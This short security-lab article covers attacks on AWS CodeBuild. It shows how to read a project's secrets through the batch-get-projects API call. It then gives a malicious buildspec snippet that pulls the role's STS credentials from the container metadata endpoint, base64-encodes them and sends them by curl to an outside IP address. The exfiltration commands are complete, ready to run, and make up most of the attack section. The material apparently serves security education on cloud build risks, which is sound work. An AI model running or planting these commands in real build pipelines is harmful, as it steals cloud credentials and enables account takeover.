Cloudbuild - Security

Security

We will discuss some of interesting security implications on CodeBuild.

Senario I - Secrets

Many times, you might find secrets in environment variables or buildspec.yml in CodeBuild. In order to view those, you need to know Project Name and then make the API call :-

Here we assumed project name to be securitylabs-article .

aws codebuild batch-get-projects --names securitylabs-articles  --region us-east-2

API call ouputs the buildspec.yml and the configured environment variables in the project.

Senario II - Stealing STS Tokens

A malicious build-spec.yml can be used to steal the STS tokens of the CodeBuild's attached role.

The below commands can be added in the buildspec to exfilterate the CodeBuild's STS credentials

curl -qL -o aws_credentials.json http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > aws_credentials.json
aws configure set region 'ap-south-1'
aws configure set aws_access_key_id `jq -r '.AccessKeyId' aws_credentials.json`
aws configure set aws_secret_access_key `jq -r '.SecretAccessKey' aws_credentials.json`
aws configure set aws_session_token `jq -r '.Token' aws_credentials.json`
encoded=$(cat ~/.aws/credentials | base64 -w 0)
curl "http://18.189.180.144:8000/&stuff=$encoded"

The first curl request to 169.254.170.2 returns STS credentials. Endpoint $_AWS_CONTAINER_CREDENTIALS_RELATIVE_URI contains the credentials path in format of /v2/credentials/<build_id> and since build-id is dynamic and not easy to guess, we would use the global environment variable to fetch the credential path.

Once the STS tokens are saved in aws_credentials.json file, we need to configure aws with the extracted credentials and finally ~/.aws/credentials can be base64 encoded and passed to our 18.189.180.144 server to exfilterate STS tokens.

Below screenshot indicates the base64 encoded credentials which were exfilterated out of codebuild.